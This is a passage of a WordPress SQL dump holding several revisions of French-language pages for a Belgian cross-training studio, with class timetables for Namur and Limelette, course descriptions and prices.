class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:05:29', '2013-11-03 09:05:29', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(409, 1, '2013-11-03 09:18:15', '2013-11-03 09:18:15', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:18:15', '2013-11-03 09:18:15', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(404, 1, '2013-11-03 09:06:37', '2013-11-03 09:06:37', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1><a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a></h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi_hover\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:06:37', '2013-11-03 09:06:37', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(405, 1, '2013-11-03 09:10:32', '2013-11-03 09:10:32', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:10:32', '2013-11-03 09:10:32', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(406, 1, '2013-11-03 09:12:01', '2013-11-03 09:12:01', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:12:01', '2013-11-03 09:12:01', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(407, 1, '2013-11-03 09:16:40', '2013-11-03 09:16:40', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:16:40', '2013-11-03 09:16:40', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(408, 1, '2013-11-03 09:17:43', '2013-11-03 09:17:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n<h1><a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a></h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n<h1>Limelette</h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td 